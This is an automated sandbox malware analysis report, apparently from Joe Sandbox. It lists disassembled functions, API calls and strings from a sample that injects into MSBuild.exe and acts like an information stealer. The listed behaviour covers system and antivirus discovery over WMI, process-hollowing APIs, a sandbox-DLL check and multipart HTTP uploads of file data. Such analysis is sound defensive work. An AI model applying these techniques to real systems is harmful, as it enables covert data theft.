WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00DDF713,00000000,00000001,00000000,00000000,?,00DD7B44,00000000,00000000,00000000,00000000), ref: 00DE0737

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: f2fcf4ee33fe96363edde5bcda5a6359875987c1c0e34a400f7dd16a9b3b9a3f
Instruction ID: 6e869890880012ea1d81b56a88001954b552af9f5f091d71c543db0729491adb
Opcode Fuzzy Hash: f2fcf4ee33fe96363edde5bcda5a6359875987c1c0e34a400f7dd16a9b3b9a3f
Instruction Fuzzy Hash: 6CF037360002D4BBCF223F95DC48A993FA6FB493A1F044014F91DDA230CA718960DFB0

Function 00DCA060 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00DCA09F
__IsNonwritableInCurrentImage.LIBCMT ref: 00DCA153

Strings

csm, xrefs: 00DCA13D

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: cd65b378ee47ae0fef5466525c5fae4911541ce5b03a591d985d9f35fbec0630
Instruction ID: 49f12ae90fc3ddd1172e630d2e270c8598bd62196e769d0b02779ecba12e2f10
Opcode Fuzzy Hash: cd65b378ee47ae0fef5466525c5fae4911541ce5b03a591d985d9f35fbec0630
Instruction Fuzzy Hash: 0C416D34A0035A9BCF109F69C881F9EBBA5AF45328F188159E8149B352C731DA45CBB2

Function 00DCA96D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00DCA992

Strings

RCC, xrefs: 00DCA9AC
MOC, xrefs: 00DCA9A4

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: eacebe30a8a42c83f20eb88152b4deca6eab5df301d4b066bfcbfbddb8e38dc0
Instruction ID: 85ea7d666bfdcffb292f8bc1ce75bc849c91257fac87bff9f312df5ecb64d335
Opcode Fuzzy Hash: eacebe30a8a42c83f20eb88152b4deca6eab5df301d4b066bfcbfbddb8e38dc0
Instruction Fuzzy Hash: 9D41277290020EAFCF16DF98C981FAEBBB5FF48308F198159FA04A7211D7359951DB62

Function 00DC6CA2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00DC7643
___raise_securityfailure.LIBCMT ref: 00DC772B

Strings

p, xrefs: 00DC7726

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: p
API String ID: 3761405300-2678736219
Opcode ID: 03a5298e4b15c0402d55fca79b751c3c7594b43db4370f54d2c9f91d21d8eb9b
Instruction ID: 7015bb69a76ea4863690e31360d644fd270fae63376f89d2537ee86c7067a74c
Opcode Fuzzy Hash: 03a5298e4b15c0402d55fca79b751c3c7594b43db4370f54d2c9f91d21d8eb9b
Instruction Fuzzy Hash: 2221F8B9541300DEE750DF26F985B503BA4FB8A300F10586AE509EBBB0E770994AEF55

Function 00DC7740 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00DC774B
___raise_securityfailure.LIBCMT ref: 00DC7808

Strings

p, xrefs: 00DC7803

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: p
API String ID: 3761405300-2678736219
Opcode ID: 813087bd86fc07d5475b6d8c71e729e44ff301d6ab005deeabb2e2dbb27ded70
Instruction ID: 9f055c581539ad7ebd0c1d5c516cf558084f74b5a9d273409d40801a996ab208
Opcode Fuzzy Hash: 813087bd86fc07d5475b6d8c71e729e44ff301d6ab005deeabb2e2dbb27ded70
Instruction Fuzzy Hash: 0711A2BD911304DFE740DF27E9816407BB4BB8A300B0059AAE509A7BB0E770954BEF56

Function 00DC15DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00DC15E6
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00DC161E

Part of subcall function 00DC5178: _Yarn.LIBCPMT ref: 00DC5197
Part of subcall function 00DC5178: _Yarn.LIBCPMT ref: 00DC51BB

Strings

bad locale name, xrefs: 00DC162C

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: f55f18de331278a31eaf97be91cf13dddc3241931170b1e98da5f79642768890
Instruction ID: 77d50c8dde2aa942cbdb9b03399c1b0d2df21d2b109639bafffb810c110a4da5
Opcode Fuzzy Hash: f55f18de331278a31eaf97be91cf13dddc3241931170b1e98da5f79642768890
Instruction Fuzzy Hash: 44F017B5545B919E83319F7A9481947FBE4FE293103948A2EE0DEC3A12D730A404CB7A

Analysis Process: MSBuild.exePID: 7436, Parent PID: 7404COMMON

Execution Graph

Execution Coverage:	14.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.6%
Total number of Nodes:	1286
Total number of Limit Nodes:	39

Executed Functions

Function 00411807 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 143
comtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 0041180E
CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043B018,?,00000018,00411901,?), ref: 00411781
Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1

FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
VariantClear.OLEAUT32(?), ref: 0041195C

Strings

InstallDate, xrefs: 004118ED
Unknown, xrefs: 00411985
Unknown, xrefs: 00411971
WQL, xrefs: 0041189A
%d/%d/%d %d:%d:%d, xrefs: 00411943
Select * From Win32_OperatingSystem, xrefs: 00411895
Unknown, xrefs: 0041196A
ROOT\CIMV2, xrefs: 00411862

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: String$CreateFreeInitializeInstanceTimeVariant$AllocBlanketClearFileH_prolog3_catchH_prolog3_catch_InitProxySecuritySystem_wtoi64
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
API String ID: 2027821108-461178377
Opcode ID: 4a998e0831886b93ed92c0276ff9e06964fee6d6e5f1487c865c121be33c5c48
Instruction ID: 99ef6883476e7e72b4c9cbd85dd5ecdaeb76e40d083b236b73c3eff291e47a74
Opcode Fuzzy Hash: 4a998e0831886b93ed92c0276ff9e06964fee6d6e5f1487c865c121be33c5c48
Instruction Fuzzy Hash: 49416C71940209BBCB10DBD5DC89EEFBBBDEB89B11F20411AF611A6190D6799941CB38

Function 0041C585 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/, xrefs: 0041C638
UT, xrefs: 0041C8B0

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: 529ba8237f0014992bab19239517a34075ee691daa6caaefc8e8a53a834a0c09
Instruction ID: ceb82e4e54f3846e9f94eab9f0bc1a81f9160b51cd409ffa36bf36e6f1d1d03f
Opcode Fuzzy Hash: 529ba8237f0014992bab19239517a34075ee691daa6caaefc8e8a53a834a0c09
Instruction Fuzzy Hash: 55027EB19442688BDF21CF64CC817EEBBB5AF45304F1440EAD949AB242D6389EC5CF99

Function 00406963 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 161
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000,00436997), ref: 004069C5
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40

Strings

hhA, xrefs: 00406976
ERROR, xrefs: 00406BAB
ERROR, xrefs: 00406AB6
GET, xrefs: 00406A42

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$ConnectCrackFileHttpOpenReadRequestSend
String ID: ERROR$ERROR$GET$hhA
API String ID: 2949174142-1019273260
Opcode ID: 5ced189bb939a1fc5faa788c84153e92a49d451aed57d78017f4c722cf7cb7a8
Instruction ID: b8be4e115d185e019c2f990b7d5ff4e2311a6bf9c79d427f1dbcd116f6077eb1
Opcode Fuzzy Hash: 5ced189bb939a1fc5faa788c84153e92a49d451aed57d78017f4c722cf7cb7a8
Instruction Fuzzy Hash: C551ADB1A00269AFDF20EB60DC84AEEB7B9FB04304F0180B6F549B2190DA755EC59F94

Function 004114A5 Relevance: 4.6, APIs: 3, Instructions: 56processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Process32Next.KERNEL32(00000000,00000128), ref: 00411542

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Process32$CreateFirstNextSnapshotToolhelp32
String ID:
API String ID: 1238713047-0
Opcode ID: d4b453576ad4f3625b6b8d3a98ae388fbddfe9144bcf6f2d6953d3127222c563
Instruction ID: cecb0f06a50482290116f099c25e0230255ed02a1d9bcffe7551c72d2d14305d
Opcode Fuzzy Hash: d4b453576ad4f3625b6b8d3a98ae388fbddfe9144bcf6f2d6953d3127222c563
Instruction Fuzzy Hash: 9C117771A00214ABDB11EB65DC85BEE73A9AB48304F400097F905A3251DB78AEC48B64

Function 00410C53 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34

Function 00410DDB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57

Strings

/ , xrefs: 00410E73

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: /
API String ID: 2299586839-4001269591
Opcode ID: b5110414db0781ed465f941b9ae6bcaf1628d348266bcf15fae52e8b0fa6dca4
Instruction ID: ba20de4f6d07cba688775156cda93bca6e715b227c052c7d3b8ee28496ea85f9
Opcode Fuzzy Hash: b5110414db0781ed465f941b9ae6bcaf1628d348266bcf15fae52e8b0fa6dca4
Instruction Fuzzy Hash: 2A314F71900328AFCB20EF65DD89BDEB3B8AB04304F5045EAF519A3152D7B86EC58F54

Function 00410D2E Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: da3ab1333ae34f1d28e0fac43badc88ac46d6a3555cecf111c3774452892b3c3
Instruction ID: 61d95923a291ecda6e095beb314f014951f64f3de92a0ce4f4bd39d2e0bf5c47
Opcode Fuzzy Hash: da3ab1333ae34f1d28e0fac43badc88ac46d6a3555cecf111c3774452892b3c3
Instruction Fuzzy Hash: F2F0E071A0132467EB04DFB4EC49B9B37659B04725F100295F511D71D0EB759E844785

Function 00410FBA Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 00410FD4

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 998f64295720f10c821e057b3243b12a1334f63cbf789cdccd19e786a3f5f674
Instruction ID: 6ece5ee49d11cdb060b7bdfc3a79890b10628a8e35908506f9dd9848dd200c5c
Opcode Fuzzy Hash: 998f64295720f10c821e057b3243b12a1334f63cbf789cdccd19e786a3f5f674
Instruction Fuzzy Hash: 63E092B1D1020DABCF04DF60EC459DE77FCEB08308F0054B5A505E3180D674AB888F44

Function 004014AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418654), ref: 004014DF

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C

Function 00405482 Relevance: 37.3, APIs: 5, Strings: 16, Instructions: 573
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
_memmove.LIBCMT ref: 00405CB4
_memmove.LIBCMT ref: 00405CD6
_memmove.LIBCMT ref: 00405D05
HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D

Strings

------, xrefs: 0040573C
--, xrefs: 00405600
file_data, xrefs: 00405C09
ERROR, xrefs: 00405D79
------, xrefs: 0040589D
", xrefs: 0040581B
", xrefs: 00405C35
block, xrefs: 00405E30
build_id, xrefs: 0040594F
af641acce3f8c85bf2490a9b3aa972c5, xrefs: 004059A7
------, xrefs: 00405B5D
", xrefs: 00405AD8
------, xrefs: 004059FF
ERROR, xrefs: 00405F2F
", xrefs: 0040597B
------, xrefs: 00405605

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: _memmove$HttpRequest$CrackInternetOpenSend
String ID: ------$"$"$"$"$--$------$------$------$------$ERROR$ERROR$af641acce3f8c85bf2490a9b3aa972c5$block$build_id$file_data
API String ID: 4290584411-4131401294
Opcode ID: 177d59b578fcbf7e257bc24f654d4a050c0cfce4b238dadea4729ba93ceee506
Instruction ID: 4baf88cb2a5c47609fe6293a48fe3edcdf17a13d7b96339157f3ca2814525fa3
Opcode Fuzzy Hash: 177d59b578fcbf7e257bc24f654d4a050c0cfce4b238dadea4729ba93ceee506
Instruction Fuzzy Hash: 8F42E671D401699BDF21FB21DC45ADDB3B9BF04308F0085E6A548B3152DAB86FCA9F98

Function 00401666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00401696
wsprintfW.USER32 ref: 004016BC
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
RtlAllocateHeap.NTDLL(00000000), ref: 00401705
_time64.MSVCRT ref: 0040170E
srand.MSVCRT ref: 00401715
rand.MSVCRT ref: 0040171E
_memset.LIBCMT ref: 0040172E
WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
_memset.LIBCMT ref: 00401763
CloseHandle.KERNEL32(?), ref: 00401771
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
_memset.LIBCMT ref: 004017BE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
RtlFreeHeap.NTDLL(00000000), ref: 004017CF
CloseHandle.KERNEL32(?), ref: 004017DB

Strings

%s%s, xrefs: 004016B6
delays.tmp, xrefs: 004016A4

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
String ID: %s%s$delays.tmp
API String ID: 1620473967-1413376734
Opcode ID: 39f734473f17f97426e056466eb3bebedc037311c24c273f22620d7e2f0f990d
Instruction ID: 9b5f552432b4e98a6f0c5797751fefc193ccc8af765751ef1568987e4d70ee72
Opcode Fuzzy Hash: 39f734473f17f97426e056466eb3bebedc037311c24c273f22620d7e2f0f990d
Instruction Fuzzy Hash: B641C6B1D00218ABDB205F61AC4CF9F7B7DEB85715F1016BAF00AE10A1DA394E54CF28

Function 00418A63 Relevance: 30.3, APIs: 6, Strings: 11, Instructions: 518
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(004173DA), ref: 00418EE8
LoadLibraryA.KERNEL32 ref: 00418F0A
LoadLibraryA.KERNEL32 ref: 00418F1B
LoadLibraryA.KERNEL32 ref: 00418F4E
LoadLibraryA.KERNEL32 ref: 00418F5F
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418F6F

Strings

ResumeThread, xrefs: 00418E9B
SymMatchString, xrefs: 0041953C
SetThreadContext, xrefs: 00418EC7
dbghelp.dll, xrefs: 00418F65
HttpQueryInfoA, xrefs: 00419427
VirtualAllocEx, xrefs: 00418E85
GetThreadContext, xrefs: 00418E59
ReadProcessMemory, xrefs: 00418E6F
WriteProcessMemory, xrefs: 00418EB1
InternetSetOptionA, xrefs: 0041943D
CreateProcessA, xrefs: 00418E43

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
API String ID: 1029625771-2740034357
Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
Instruction ID: 8ba0d5c8ae2e13c06544b1593b83c2cece409b0c910b42dbc8887f4207037caa
Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
Instruction Fuzzy Hash: C752F475910312AFEF1ADFA0FD088243BA7F718707F11A466E91582270E73B4A64EF19

Function 00411997 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch.LIBCMT ref: 0041199E
CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
VariantInit.OLEAUT32(?), ref: 00411A5D
VariantClear.OLEAUT32(?), ref: 00411A8B

Strings

WQL, xrefs: 00411A28
displayName, xrefs: 00411A6F
Unknown, xrefs: 00411A99
Select * From AntiVirusProduct, xrefs: 00411A23
Unknown, xrefs: 00411AA0
root\SecurityCenter2, xrefs: 004119F0
Unknown, xrefs: 00411AB4

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: InitializeVariant$BlanketClearCreateH_prolog3_catchInitInstanceProxySecurity
